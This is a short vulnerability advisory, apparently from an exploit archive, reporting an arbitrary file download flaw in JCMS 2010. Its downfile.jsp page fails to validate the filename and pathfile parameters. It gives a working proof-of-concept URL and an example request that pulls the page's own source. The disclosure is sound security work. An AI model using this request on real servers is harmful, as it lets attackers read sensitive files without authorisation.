id: 14950
date: 11/23/2010
title: JCMS 2010 file download vulnerability
author: Beach
cves: 

=====================================
JCMS 2010 file download vulnerability
=====================================

#####################################################################################################
#Title:   JCMS 2010 File Download Vulnerability
#Date:    2010-11-22
#Author:  Beach
#Team:    http://www.linux520.com/
#Vendor:  http://www.hanweb.com/
#Language:Java
#Greetz:  Brother
#####################################################################################################
[*]Description:
 
In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input
So this vulnerability allows an attacker to download any files .
#####################################################################################################
[*]POC:
 
http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name]
#####################################################################################################
[*]I.E:
 
http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp
#####################################################################################################



#  0day.today [2023-03-24]  #